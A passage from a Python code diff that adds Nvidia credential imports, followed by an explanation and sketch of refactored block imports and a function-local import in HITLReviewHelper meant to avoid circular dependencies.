     BlockOutput,
     BlockSchemaInput,
     BlockSchemaOutput,
 )
+from backend.blocks.nvidia._auth import (
+    NvidiaCredentials,
+    NvidiaCredentialsField,
+    NvidiaCredentialsInput,
+)
 from backend.data.model import SchemaField
 from backend.util.request import Requests
 from backend.util.type import MediaFileType
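Taken together, these hunks make two mechanical changes: the block primitives (Block, BlockCategory, BlockOutput, BlockSchemaInput, BlockSchemaOutput, BlockType) are now imported from backend.blocks._base rather than backend.data.block, and HITLReviewHelper moves two imports from module level into function bodies. The sketch below illustrates that second, function-local import pattern, on the assumption that its purpose here is to avoid a circular import between the blocks helpers and the executor; the class and import names are taken from the hunks above, but the simplified body is not the repository's actual code (the real helper also passes a db_client argument).

# Sketch: deferred (function-local) import, as in
# HITLReviewHelper.update_node_execution_status above.
class HITLReviewHelper:
    @staticmethod
    async def update_node_execution_status(**kwargs) -> None:
        """Update the execution status of a node."""
        # Imported here instead of at module top level: the name is
        # resolved on first call, so merely importing this helper never
        # loads backend.executor.manager (breaking the import cycle).
        from backend.executor.manager import async_update_node_execution_status

        await async_update_node_execution_status(**kwargs)

The trade-off is a small cost on first call and a less visible dependency graph, in exchange for removing the module-level cycle.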
Some files were not shown because too many files have changed in this diff.